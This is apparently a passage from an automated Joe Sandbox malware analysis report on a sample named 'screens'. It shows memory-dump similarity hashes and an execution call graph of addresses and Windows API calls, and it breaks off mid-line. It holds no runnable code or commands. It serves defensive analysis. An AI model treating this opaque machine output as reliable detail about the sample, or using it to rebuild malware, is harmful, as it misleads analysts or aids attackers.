                                                            • Opcode Fuzzy Hash: eb8da70990cff89fba8e768d9c22c3b1a7e3541c74b64c39237b2ffeaa93af1e
                                                            • Instruction Fuzzy Hash: 544108B0E0561ACBCF44CFAAC5805AEFBF6FB88300F64C56AD905AB314D7749A41CB94
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1530446511.000000000D060000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D060000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_d060000_screens.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d970c11d68ce5f0a34ff52b13b47b5ae81fef7108d7a53bea89a3ee9c0de5241
                                                            • Instruction ID: 41279025d4b9ae1a1d643a5fd2490b4d213ae5c16643475bc579a8bf76f3342b
                                                            • Opcode Fuzzy Hash: d970c11d68ce5f0a34ff52b13b47b5ae81fef7108d7a53bea89a3ee9c0de5241
                                                            • Instruction Fuzzy Hash: 4941FAB0E0561ADBDB44CFAAD5415AEFBF6FF88200F24C06AC519F7218D7749A418BA4
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1509042655.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_2d50000_screens.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 74eb49ceebbe3e1a0b82456ff9ce37da05e79eb89aa82f9d2807a1e4c7a19522
                                                            • Instruction ID: 06c98613645f2678cc79987cf429f182fbbf91c7f242b4f1e3c4bafb0016808a
                                                            • Opcode Fuzzy Hash: 74eb49ceebbe3e1a0b82456ff9ce37da05e79eb89aa82f9d2807a1e4c7a19522
                                                            • Instruction Fuzzy Hash: 9541E470D0461A9FDF48CFAAC4415AEFBF6BB88300F50C42AC855A7354E7789A428F94
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1509042655.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_2d50000_screens.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fb3f5b46452ee5a5c122bc12e2787759cd8c0d83250e9f2298020a4eec44816e
                                                            • Instruction ID: 092fc8911fbc539eca91df0e3fd38c1e1cb9257c5283f205eacb1d84594ff910
                                                            • Opcode Fuzzy Hash: fb3f5b46452ee5a5c122bc12e2787759cd8c0d83250e9f2298020a4eec44816e
                                                            • Instruction Fuzzy Hash: 1641F670E0461A9FDF48CFAAC4815AEFBF6BB88300F54C42AC855A7354E7789A41CF94
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1529876006.000000000ABE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0ABE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_abe0000_screens.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 388746546ab2411dc7cb87a0ed9ec65a0adb56b2d9d79b64a3d724b0a405ac5f
                                                            • Instruction ID: 1694bbd2ae847ac03114481e693c9f2a9039f5d088ea1bcc3ee6c8fe93862ef4
                                                            • Opcode Fuzzy Hash: 388746546ab2411dc7cb87a0ed9ec65a0adb56b2d9d79b64a3d724b0a405ac5f
                                                            • Instruction Fuzzy Hash: A8412A70E112189FDB58CF66D945B9EFBF6BF88200F14C0AAD508A7355DB709A81CF51
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1530245195.000000000AEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AEA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_aea0000_screens.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6ba52e316db52f7c18de1b7aee63860d8b80b55c8aec94a8694dfb1eee48098c
                                                            • Instruction ID: 4bf876aa46b391de7d272bd67f2f9fca6c9abeac1c51f2c4e832655c4dad4498
                                                            • Opcode Fuzzy Hash: 6ba52e316db52f7c18de1b7aee63860d8b80b55c8aec94a8694dfb1eee48098c
                                                            • Instruction Fuzzy Hash: 45313B71E046289BDB68CF6ADD406DAF7B7BBD9300F44D1BA850CEB214DA305A859F00
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1529876006.000000000ABE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0ABE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_abe0000_screens.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d567b7e2c7f973306811c42b74d8d07c65d9b797c63f9d38d021a0f8db6afb63
                                                            • Instruction ID: b8cd05b122449a96ee581b4b9d3ca77f044eb32e42fd51c8f33a374c3dc864cd
                                                            • Opcode Fuzzy Hash: d567b7e2c7f973306811c42b74d8d07c65d9b797c63f9d38d021a0f8db6afb63
                                                            • Instruction Fuzzy Hash: ED31D771E046189BDB68CF2AD8407DABBB7BBC9300F14C0FA940DA7214DB315A959F50
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1530245195.000000000AEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AEA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_aea0000_screens.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fc74d095f46f50d4b36b241e27a4b82e33335a086ed0a056f590457f1d2252a7
                                                            • Instruction ID: dc7010d28b756ca540bebb50d39d446175238a710faffffef5b5a488fc94f62f
                                                            • Opcode Fuzzy Hash: fc74d095f46f50d4b36b241e27a4b82e33335a086ed0a056f590457f1d2252a7
                                                            • Instruction Fuzzy Hash: AB213D71E047549FD769CF668C546DABBB3AFD6310F09C4FA8448AB215EA340D86CF10
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1530446511.000000000D060000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D060000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_d060000_screens.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 940f0cc42959a9aaf2911f073b8186df24da4980a02b0dc47e0cfb2fcb9a1fd1
                                                            • Instruction ID: 7435441c4daeed61358e761b5ba478d460081c811e09a8d1ea50bed80b8d72f1
                                                            • Opcode Fuzzy Hash: 940f0cc42959a9aaf2911f073b8186df24da4980a02b0dc47e0cfb2fcb9a1fd1
                                                            • Instruction Fuzzy Hash: F1111771E106199BEB48CFAAE9406DEFBF7BFC8200F14C07AD408A7214EB345A018F91

                                                            Execution Graph

                                                            Execution Coverage:31.2%
                                                            Dynamic/Decrypted Code Coverage:0%
                                                            Signature Coverage:4.5%
                                                            Total number of Nodes:1833
                                                            Total number of Limit Nodes:93
                                                            execution_graph 9683 40c640 9710 404bee 9683->9710 9686 40c70f 9687 404bee 6 API calls 9688 40c66b 9687->9688 9689 40c708 9688->9689 9691 404bee 6 API calls 9688->9691 9690 402bab 2 API calls 9689->9690 9690->9686 9692 40c683 9691->9692 9693 40c701 9692->9693 9694 404bee 6 API calls 9692->9694 9695 402bab 2 API calls 9693->9695 9698 40c694 9694->9698 9695->9689 9696 40c6f8 9697 402bab 2 API calls 9696->9697 9697->9693 9698->9696 9717 40c522 9698->9717 9700 40c6a9 9702 405872 4 API calls 9700->9702 9709 40c6ef 9700->9709 9701 402bab 2 API calls 9701->9696 9703 40c6c5 9702->9703 9704 405872 4 API calls 9703->9704 9705 40c6d5 9704->9705 9706 405872 4 API calls 9705->9706 9707 40c6e7 9706->9707 9708 402bab 2 API calls 9707->9708 9708->9709 9709->9701 9711 402b7c 2 API calls 9710->9711 9712 404bff 9711->9712 9713 4031e5 4 API calls 9712->9713 9716 404c3b 9712->9716 9714 404c28 9713->9714 9715 402bab 2 API calls 9714->9715 9714->9716 9715->9716 9716->9686 9716->9687 9718 402b7c 2 API calls 9717->9718 9719 40c542 9718->9719 9719->9700 9720 405941 9721 4031e5 4 API calls 9720->9721 9722 405954 9721->9722 9723 405641 9724 405673 9723->9724 9725 40564d 9723->9725 9725->9724 9726 4056fc 4 API calls 9725->9726 9726->9724 9727 406642 9728 406662 9727->9728 9729 4031e5 4 API calls 9728->9729 9730 406676 9729->9730 9740 4066bf 9730->9740 9735 4066b1 9738 4036a3 4 API calls 9735->9738 9736 4066a7 9737 4036a3 4 API calls 9736->9737 9739 4066ac 9737->9739 9738->9739 9741 4031e5 4 API calls 9740->9741 9742 4066dc 9741->9742 9743 4066f6 SetLastError 9742->9743 9744 406708 GetLastError 9742->9744 9745 406693 9743->9745 9744->9745 9746 406713 9744->9746 9762 406455 9745->9762 9747 4031e5 4 API calls 9746->9747 9748 406725 9747->9748 9748->9745 9749 4031e5 4 API calls 9748->9749 9750 40673f 9749->9750 9751 406753 9750->9751 9752 406749 9750->9752 9754 4031e5 4 API calls 9751->9754 9753 4036a3 4 API calls 9752->9753 9753->9745 9755 406761 9754->9755 9756 40678a 9755->9756 9757 40677c 9755->9757 9758 4036a3 4 API calls 9756->9758 9759 4036a3 4 API calls 9757->9759 9758->9745 9760 406781 9759->9760 9761 4036a3 4 API calls 9760->9761 9761->9745 9763 4031e5 4 API calls 9762->9763 9764 406468 9763->9764 9764->9735 9764->9736 8287 409046 8300 413b28 8287->8300 8289 40906d 8291 405b6f 6 API calls 8289->8291 8290 40904e 8290->8289 8292 403fbf 7 API calls 8290->8292 8293 40907c 8291->8293 8292->8289 8294 409092 8293->8294 8304 409408 8293->8304 8296 4090a3 8294->8296 8299 402bab 2 API calls 8294->8299 8298 402bab 2 API calls 8298->8294 8299->8296 8301 413b31 8300->8301 8302 413b38 8300->8302 8303 404056 6 API calls 8301->8303 8302->8290 8303->8302 8305 409413 8304->8305 8306 40908c 8305->8306 8318 409d36 8305->8318 8306->8298 8317 40945c 8424 40a35d 8317->8424 8319 409d43 8318->8319 8320 40a35d 4 API calls 8319->8320 8321 409d55 8320->8321 8322 4031e5 4 API calls 8321->8322 8323 409d8b 8322->8323 8324 4031e5 4 API calls 8323->8324 8325 409dd0 8324->8325 8326 405b6f 6 API calls 8325->8326 8358 409423 8325->8358 8329 409df7 8326->8329 8327 409e1c 8328 4031e5 4 API calls 8327->8328 8327->8358 8330 409e62 8328->8330 8329->8327 8331 402bab 2 API calls 8329->8331 8332 4031e5 4 API calls 8330->8332 8331->8327 8333 409e82 8332->8333 8334 4031e5 4 API calls 8333->8334 8335 409ea2 8334->8335 8336 4031e5 4 API calls 8335->8336 8337 409ec2 8336->8337 8338 4031e5 4 API calls 8337->8338 8339 409ee2 8338->8339 8340 4031e5 4 API calls 8339->8340 8341 409f02 8340->8341 8342 4031e5 4 API calls 8341->8342 8343 409f22 8342->8343 8344 4031e5 4 API calls 8343->8344 8347 409f42 8344->8347 8345 40a19b 8346 408b2c 4 API calls 8345->8346 8346->8358 8347->8345 8348 409fa3 8347->8348 8349 405b6f 6 API calls 8348->8349 8348->8358 8350 409fbd 8349->8350 8351 40a02c 8350->8351 8353 402bab 2 API calls 8350->8353 8352 40a16d 8351->8352 8354 4031e5 4 API calls 8351->8354 8355 402bab 2 API calls 8352->8355 8352->8358 8356 409fd7 8353->8356 8357 40a070 8354->8357 8355->8358 8359 405b6f 6 API calls 8356->8359 8360 4031e5 4 API calls 8357->8360 8358->8317 8380 4056bf 8358->8380 8362 409fe5 8359->8362 8361 40a090 8360->8361 8363 4031e5 4 API calls 8361->8363 8362->8351 8364 402bab 2 API calls 8362->8364 8365 40a0b0 8363->8365 8366 409fff 8364->8366 8369 4031e5 4 API calls 8365->8369 8367 405b6f 6 API calls 8366->8367 8368 40a00d 8367->8368 8368->8351 8371 40a021 8368->8371 8370 40a0d0 8369->8370 8373 4031e5 4 API calls 8370->8373 8372 402bab 2 API calls 8371->8372 8372->8358 8374 40a0f0 8373->8374 8375 4031e5 4 API calls 8374->8375 8376 40a110 8375->8376 8377 40a134 8376->8377 8378 4031e5 4 API calls 8376->8378 8377->8352 8434 408b2c 8377->8434 8378->8377 8381 402b7c 2 API calls 8380->8381 8382 4056cd 8381->8382 8383 402b7c 2 API calls 8382->8383 8384 4056d4 8382->8384 8383->8384 8385 408c4d 8384->8385 8386 413ba4 6 API calls 8385->8386 8387 408c5c 8386->8387 8388 408f02 8387->8388 8389 408f3a 8387->8389 8392 40903e 8387->8392 8391 405b6f 6 API calls 8388->8391 8390 405b6f 6 API calls 8389->8390 8406 408f51 8390->8406 8393 408f0c 8391->8393 8408 413aca 8392->8408 8393->8392 8397 408f31 8393->8397 8437 40a1b6 8393->8437 8395 405b6f 6 API calls 8395->8406 8396 402bab 2 API calls 8396->8392 8397->8396 8399 409031 8400 402bab 2 API calls 8399->8400 8400->8397 8401 409022 8402 402bab 2 API calls 8401->8402 8403 409028 8402->8403 8404 402bab 2 API calls 8403->8404 8404->8397 8405 402bab GetProcessHeap HeapFree 8405->8406 8406->8392 8406->8395 8406->8397 8406->8399 8406->8401 8406->8405 8407 40a1b6 14 API calls 8406->8407 8471 4044ee 8406->8471 8407->8406 8409 409451 8408->8409 8410 413ad7 8408->8410 8418 405695 8409->8418 8411 405781 4 API calls 8410->8411 8412 413af0 8411->8412 8413 405781 4 API calls 8412->8413 8414 413afe 8413->8414 8415 405762 4 API calls 8414->8415 8416 413b0e 8415->8416 8416->8409 8417 405781 4 API calls 8416->8417 8417->8409 8419 4056a0 8418->8419 8420 4056b9 8418->8420 8421 402bab 2 API calls 8419->8421 8420->8317 8422 4056b3 8421->8422 8423 402bab 2 API calls 8422->8423 8423->8420 8425 40a368 8424->8425 8426 40a39a 8424->8426 8432 4031e5 4 API calls 8425->8432 8427 40a3af 8426->8427 8428 4031e5 4 API calls 8426->8428 8429 40a3ca 8427->8429 8430 408b2c 4 API calls 8427->8430 8428->8427 8431 40a38a 8429->8431 8433 408b2c 4 API calls 8429->8433 8430->8429 8431->8306 8432->8431 8433->8431 8435 4031e5 4 API calls 8434->8435 8436 408b3e 8435->8436 8436->8352 8438 40a202 8437->8438 8439 40a1c3 8437->8439 8593 405f08 8438->8593 8441 405b6f 6 API calls 8439->8441 8443 40a1d0 8441->8443 8442 40a1fc 8442->8397 8443->8442 8444 40a1f3 8443->8444 8481 40a45b 8443->8481 8449 402bab 2 API calls 8444->8449 8446 40a333 8448 402bab 2 API calls 8446->8448 8448->8442 8449->8442 8450 405b6f 6 API calls 8452 40a245 8450->8452 8451 40a25d 8453 405b6f 6 API calls 8451->8453 8452->8451 8454 413a58 13 API calls 8452->8454 8459 40a26b 8453->8459 8455 40a257 8454->8455 8458 402bab 2 API calls 8455->8458 8456 40a28b 8457 405b6f 6 API calls 8456->8457 8464 40a297 8457->8464 8458->8451 8459->8456 8460 40a284 8459->8460 8600 40955b 8459->8600 8461 402bab 2 API calls 8460->8461 8461->8456 8463 405b6f 6 API calls 8468 40a2b7 8463->8468 8465 40a2b0 8464->8465 8464->8468 8607 40968e 8464->8607 8467 402bab 2 API calls 8465->8467 8467->8468 8468->8446 8468->8463 8470 402bab 2 API calls 8468->8470 8617 4098a7 8468->8617 8470->8468 8472 402b7c 2 API calls 8471->8472 8473 404512 8472->8473 8475 404585 GetLastError 8473->8475 8476 402bab 2 API calls 8473->8476 8479 40457c 8473->8479 8480 402b7c 2 API calls 8473->8480 8872 4044a7 8473->8872 8477 404592 8475->8477 8475->8479 8476->8473 8478 402bab 2 API calls 8477->8478 8478->8479 8479->8406 8480->8473 8626 40642c 8481->8626 8483 40a469 8484 40c4ff 8483->8484 8629 4047e6 8483->8629 8484->8444 8487 4040bb 12 API calls 8488 40bf88 8487->8488 8488->8484 8489 403c90 8 API calls 8488->8489 8490 40bfaa 8489->8490 8491 402b7c 2 API calls 8490->8491 8493 40bfc1 8491->8493 8492 40c4f3 8494 403f9e 5 API calls 8492->8494 8495 40c3aa 8493->8495 8636 40a423 8493->8636 8494->8484 8495->8492 8498 4056bf 2 API calls 8495->8498 8501 40c4e3 8495->8501 8496 402bab 2 API calls 8496->8492 8500 40c3d2 8498->8500 8500->8501 8503 4040bb 12 API calls 8500->8503 8501->8496 8502 405f08 4 API calls 8504 40c005 8502->8504 8505 40c3f3 8503->8505 8506 40c021 8504->8506 8639 40a43f 8504->8639 8508 40c4d1 8505->8508 8696 405a52 8505->8696 8507 4031e5 4 API calls 8506->8507 8510 40c034 8507->8510 8513 413aca 4 API calls 8508->8513 8519 4031e5 4 API calls 8510->8519 8514 40c4dd 8513->8514 8517 405695 2 API calls 8514->8517 8515 40c411 8701 405a87 8515->8701 8516 402bab 2 API calls 8516->8506 8517->8501 8525 40c04d 8519->8525 8520 40c4b3 8521 402bab 2 API calls 8520->8521 8523 40c4cb 8521->8523 8522 405a52 4 API calls 8533 40c423 8522->8533 8524 403f9e 5 API calls 8523->8524 8524->8508 8527 4031e5 4 API calls 8525->8527 8526 405a87 4 API calls 8526->8533 8528 40c085 8527->8528 8530 4031e5 4 API calls 8528->8530 8529 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8529->8533 8531 40c09c 8530->8531 8534 4031e5 4 API calls 8531->8534 8532 402bab 2 API calls 8532->8533 8533->8520 8533->8522 8533->8526 8533->8529 8533->8532 8535 40c0b3 8534->8535 8536 4031e5 4 API calls 8535->8536 8537 40c0ca 8536->8537 8538 4031e5 4 API calls 8537->8538 8539 40c0e7 8538->8539 8540 4031e5 4 API calls 8539->8540 8541 40c100 8540->8541 8542 4031e5 4 API calls 8541->8542 8543 40c119 8542->8543 8544 4031e5 4 API calls 8543->8544 8545 40c132 8544->8545 8546 4031e5 4 API calls 8545->8546 8547 40c14b 8546->8547 8548 4031e5 4 API calls 8547->8548 8549 40c164 8548->8549 8550 4031e5 4 API calls 8549->8550 8551 40c17d 8550->8551 8552 4031e5 4 API calls 8551->8552 8553 40c196 8552->8553 8554 4031e5 4 API calls 8553->8554 8555 40c1af 8554->8555 8556 4031e5 4 API calls 8555->8556 8557 40c1c8 8556->8557 8558 4031e5 4 API calls 8557->8558 8559 40c1de 8558->8559 8560 4031e5 4 API calls 8559->8560 8561 40c1f4 8560->8561 8562 4031e5 4 API calls 8561->8562 8563 40c20d 8562->8563 8564 4031e5 4 API calls 8563->8564 8565 40c226 8564->8565 8566 4031e5 4 API calls 8565->8566 8567 40c23f 8566->8567 8568 4031e5 4 API calls 8567->8568 8569 40c258 8568->8569 8570 4031e5 4 API calls 8569->8570 8571 40c273 8570->8571 8572 4031e5 4 API calls 8571->8572 8573 40c28a 8572->8573 8574 4031e5 4 API calls 8573->8574 8577 40c2d5 8574->8577 8575 40c3a2 8576 402bab 2 API calls 8575->8576 8576->8495 8577->8575 8578 4031e5 4 API calls 8577->8578 8579 40c315 8578->8579 8580 40c38b 8579->8580 8642 404866 8579->8642 8581 403c40 5 API calls 8580->8581 8583 40c397 8581->8583 8585 403c40 5 API calls 8583->8585 8585->8575 8586 40c382 8588 403c40 5 API calls 8586->8588 8588->8580 8590 406c4c 6 API calls 8591 40c355 8590->8591 8591->8586 8666 4126a7 8591->8666 8594 4031e5 4 API calls 8593->8594 8595 405f1d 8594->8595 8596 402b7c 2 API calls 8595->8596 8599 405f55 8595->8599 8597 405f36 8596->8597 8598 4031e5 4 API calls 8597->8598 8597->8599 8598->8599 8599->8442 8599->8446 8599->8450 8599->8451 8601 409673 8600->8601 8606 40956d 8600->8606 8601->8460 8602 408b45 6 API calls 8602->8606 8603 4059d8 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 8603->8606 8604 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8604->8606 8605 402bab GetProcessHeap HeapFree 8605->8606 8606->8601 8606->8602 8606->8603 8606->8604 8606->8605 8608 4040bb 12 API calls 8607->8608 8616 4096a9 8608->8616 8609 40989f 8609->8465 8610 409896 8611 403f9e 5 API calls 8610->8611 8611->8609 8613 408b45 6 API calls 8613->8616 8614 402bab GetProcessHeap HeapFree 8614->8616 8615 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8615->8616 8616->8609 8616->8610 8616->8613 8616->8614 8616->8615 8865 4059d8 8616->8865 8618 4040bb 12 API calls 8617->8618 8624 4098c1 8618->8624 8619 4099fb 8619->8468 8620 4099f3 8621 403f9e 5 API calls 8620->8621 8621->8619 8622 4059d8 4 API calls 8622->8624 8623 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8623->8624 8624->8619 8624->8620 8624->8622 8624->8623 8625 402bab GetProcessHeap HeapFree 8624->8625 8625->8624 8627 4031e5 4 API calls 8626->8627 8628 406441 GetNativeSystemInfo 8627->8628 8628->8483 8630 4031e5 4 API calls 8629->8630 8633 40480a 8630->8633 8631 40485d 8631->8484 8631->8487 8632 4031e5 4 API calls 8632->8633 8633->8631 8633->8632 8634 40484f 8633->8634 8635 403c40 5 API calls 8634->8635 8635->8631 8637 4031e5 4 API calls 8636->8637 8638 40a435 8637->8638 8638->8502 8640 4031e5 4 API calls 8639->8640 8641 40a451 8640->8641 8641->8516 8643 4031e5 4 API calls 8642->8643 8644 40487c 8643->8644 8644->8586 8645 406c4c 8644->8645 8706 4068eb 8645->8706 8647 406e02 8647->8590 8648 406cab 8718 40469b 8648->8718 8649 406c6c 8649->8647 8649->8648 8715 406894 8649->8715 8656 406df1 8657 40469b 4 API calls 8656->8657 8657->8647 8658 406cef 8658->8656 8659 4031e5 4 API calls 8658->8659 8660 406d26 8659->8660 8660->8656 8661 40771e 6 API calls 8660->8661 8665 406d57 8661->8665 8662 406da2 8663 4031e5 4 API calls 8662->8663 8663->8656 8665->8662 8731 4068b0 8665->8731 8667 4126bb 8666->8667 8668 4126d1 8666->8668 8670 412840 8667->8670 8787 40488c 8667->8787 8668->8670 8793 407055 8668->8793 8670->8586 8674 403c40 5 API calls 8674->8670 8676 4070ff 6 API calls 8677 412837 8676->8677 8677->8674 8678 407055 6 API calls 8679 412742 8678->8679 8680 41281e 8679->8680 8681 40719a 6 API calls 8679->8681 8680->8676 8682 41276e 8681->8682 8683 412804 8682->8683 8809 406f4a 8682->8809 8837 4070ff 8683->8837 8686 41279a 8815 412553 8686->8815 8859 405907 8696->8859 8698 405907 4 API calls 8700 405a61 8698->8700 8699 405a76 8699->8515 8700->8698 8700->8699 8702 402b7c 2 API calls 8701->8702 8704 405a99 8702->8704 8705 405ade 8704->8705 8862 40595e 8704->8862 8705->8533 8734 4076a8 8706->8734 8708 406913 8709 406a61 8708->8709 8710 40771e 6 API calls 8708->8710 8709->8649 8714 406949 8710->8714 8711 40771e 6 API calls 8711->8714 8712 404678 4 API calls 8712->8714 8714->8709 8714->8711 8714->8712 8740 4046c2 8714->8740 8716 4031e5 4 API calls 8715->8716 8717 4068a6 8716->8717 8717->8649 8719 4046a4 8718->8719 8721 4046b4 8718->8721 8720 4031e5 4 API calls 8719->8720 8720->8721 8721->8647 8722 404678 8721->8722 8723 4031e5 4 API calls 8722->8723 8724 40468b 8723->8724 8724->8647 8725 40771e 8724->8725 8726 407748 8725->8726 8727 407737 8725->8727 8726->8658 8728 407644 6 API calls 8727->8728 8729 407741 8728->8729 8730 406baa 6 API calls 8729->8730 8730->8726 8732 4031e5 4 API calls 8731->8732 8733 4068c2 8732->8733 8733->8665 8735 4076c1 8734->8735 8737 4076d2 8734->8737 8748 407644 8735->8748 8737->8708 8741 4046d3 8740->8741 8743 4046d9 8740->8743 8783 40464c 8741->8783 8744 4046e9 8743->8744 8745 404678 4 API calls 8743->8745 8746 404714 8744->8746 8747 40469b 4 API calls 8744->8747 8745->8744 8746->8714 8747->8746 8749 407653 8748->8749 8750 407661 8748->8750 8749->8750 8756 406a6b 8749->8756 8752 406baa 8750->8752 8753 406bbb 8752->8753 8755 406bc8 8752->8755 8753->8755 8764 407402 8753->8764 8755->8737 8757 406a81 8756->8757 8758 402b7c 2 API calls 8757->8758 8759 406894 4 API calls 8757->8759 8760 406b96 8757->8760 8761 402bab 2 API calls 8757->8761 8763 406b8b 8757->8763 8758->8757 8759->8757 8762 402bab 2 API calls 8760->8762 8761->8757 8762->8763 8763->8750 8765 407644 6 API calls 8764->8765 8766 407412 8765->8766 8767 402b7c 2 API calls 8766->8767 8774 407450 8766->8774 8768 407483 8767->8768 8769 402b7c 2 API calls 8768->8769 8768->8774 8772 4074ce 8769->8772 8770 4074da 8771 4068cc 2 API calls 8770->8771 8771->8774 8772->8770 8773 402b7c 2 API calls 8772->8773 8777 40751f 8773->8777 8774->8755 8775 40752b 8776 4068cc 2 API calls 8775->8776 8776->8770 8777->8775 8779 4068cc 8777->8779 8780 4068d6 8779->8780 8781 4068e3 8779->8781 8780->8781 8782 402bab GetProcessHeap HeapFree 8780->8782 8781->8775 8782->8781 8784 404659 8783->8784 8786 404666 8783->8786 8785 4031e5 4 API calls 8784->8785 8785->8786 8786->8743 8788 4047e6 5 API calls 8787->8788 8789 404897 8788->8789 8790 40489c 8789->8790 8845 4047c7 8789->8845 8790->8668 8794 40706f 8793->8794 8795 407084 8793->8795 8794->8795 8796 407644 6 API calls 8794->8796 8800 4070e4 8795->8800 8848 406fd2 8795->8848 8797 40707d 8796->8797 8799 406baa 6 API calls 8797->8799 8799->8795 8800->8677 8801 40719a 8800->8801 8802 4071b0 8801->8802 8806 4071c5 8801->8806 8803 407644 6 API calls 8802->8803 8802->8806 8804 4071be 8803->8804 8805 406baa 6 API calls 8804->8805 8805->8806 8807 406fd2 4 API calls 8806->8807 8808 407226 8806->8808 8807->8808 8808->8678 8808->8680 8810 406f64 8809->8810 8814 406f75 8809->8814 8811 407644 6 API calls 8810->8811 8812 406f6e 8811->8812 8813 406baa 6 API calls 8812->8813 8813->8814 8814->8686 8856 4060ac 8815->8856 8838 407116 8837->8838 8839 40712b 8837->8839 8838->8839 8840 407644 6 API calls 8838->8840 8842 406fd2 4 API calls 8839->8842 8844 407187 8839->8844 8841 407124 8840->8841 8843 406baa 6 API calls 8841->8843 8842->8844 8843->8839 8844->8680 8846 4031e5 4 API calls 8845->8846 8847 4047d9 8846->8847 8847->8668 8849 406fde 8848->8849 8850 4031e5 4 API calls 8849->8850 8851 407027 8849->8851 8852 406ffa 8850->8852 8851->8800 8853 4031e5 4 API calls 8852->8853 8854 407011 8853->8854 8855 4031e5 4 API calls 8854->8855 8855->8851 8857 4031e5 4 API calls 8856->8857 8858 4060bb 8857->8858 8858->8858 8860 4031e5 4 API calls 8859->8860 8861 40591a 8860->8861 8861->8700 8863 4031e5 4 API calls 8862->8863 8864 405971 8863->8864 8864->8704 8866 4031e5 4 API calls 8865->8866 8867 4059ed 8866->8867 8868 402b7c 2 API calls 8867->8868 8871 405a38 8867->8871 8869 405a16 8868->8869 8870 4031e5 4 API calls 8869->8870 8869->8871 8870->8871 8871->8616 8873 4031e5 4 API calls 8872->8873 8874 4044b9 8873->8874 8874->8473 9836 40a349 9837 4098a7 13 API calls 9836->9837 9838 40a359 9837->9838 9033 408952 9054 40823f 9033->9054 9036 408960 9038 4056bf 2 API calls 9036->9038 9039 40896a 9038->9039 9082 408862 9039->9082 9041 413aca 4 API calls 9042 4089d4 9041->9042 9044 405695 2 API calls 9042->9044 9043 408975 9051 4089c4 9043->9051 9090 4087d6 9043->9090 9046 4089df 9044->9046 9051->9041 9052 402bab 2 API calls 9053 40899d 9052->9053 9053->9051 9053->9052 9055 40824d 9054->9055 9056 4031e5 4 API calls 9055->9056 9069 40831b 9055->9069 9057 40826d 9056->9057 9058 4031e5 4 API calls 9057->9058 9059 408289 9058->9059 9060 4031e5 4 API calls 9059->9060 9061 4082a5 9060->9061 9062 4031e5 4 API calls 9061->9062 9063 4082c1 9062->9063 9064 4031e5 4 API calls 9063->9064 9065 4082e2 9064->9065 9066 4031e5 4 API calls 9065->9066 9067 4082ff 9066->9067 9068 4031e5 4 API calls 9067->9068 9068->9069 9069->9036 9070 4083bb 9069->9070 9118 408363 9070->9118 9073 4084ab 9073->9036 9074 4056bf 2 API calls 9079 4083f4 9074->9079 9075 408492 9076 413aca 4 API calls 9075->9076 9077 4084a0 9076->9077 9078 405695 2 API calls 9077->9078 9078->9073 9079->9075 9121 40815d 9079->9121 9136 40805d 9079->9136 9151 404b8f 9082->9151 9084 408946 9084->9043 9085 40887e 9085->9084 9086 4031e5 4 API calls 9085->9086 9087 40893e 9085->9087 9089 402b7c 2 API calls 9085->9089 9086->9085 9154 404a39 9087->9154 9089->9085 9091 402b7c 2 API calls 9090->9091 9092 4087e7 9091->9092 9093 40885a 9092->9093 9094 4031e5 4 API calls 9092->9094 9102 408749 9093->9102 9097 408802 9094->9097 9095 408853 9096 402bab 2 API calls 9095->9096 9096->9093 9097->9095 9099 40884d 9097->9099 9163 408522 9097->9163 9167 4084b4 9097->9167 9170 4084d4 9099->9170 9103 404b8f 5 API calls 9102->9103 9108 408765 9103->9108 9104 4087cf 9110 4085d1 9104->9110 9105 4031e5 4 API calls 9105->9108 9106 408522 4 API calls 9106->9108 9107 4087c7 9109 404a39 5 API calls 9107->9109 9108->9104 9108->9105 9108->9106 9108->9107 9109->9104 9111 4086c2 9110->9111 9114 4085e9 9110->9114 9111->9053 9113 402bab 2 API calls 9113->9114 9114->9111 9114->9113 9115 4031e5 4 API calls 9114->9115 9176 4089e6 9114->9176 9195 4086c9 9114->9195 9199 4036a3 9114->9199 9115->9114 9119 4031e5 4 API calls 9118->9119 9120 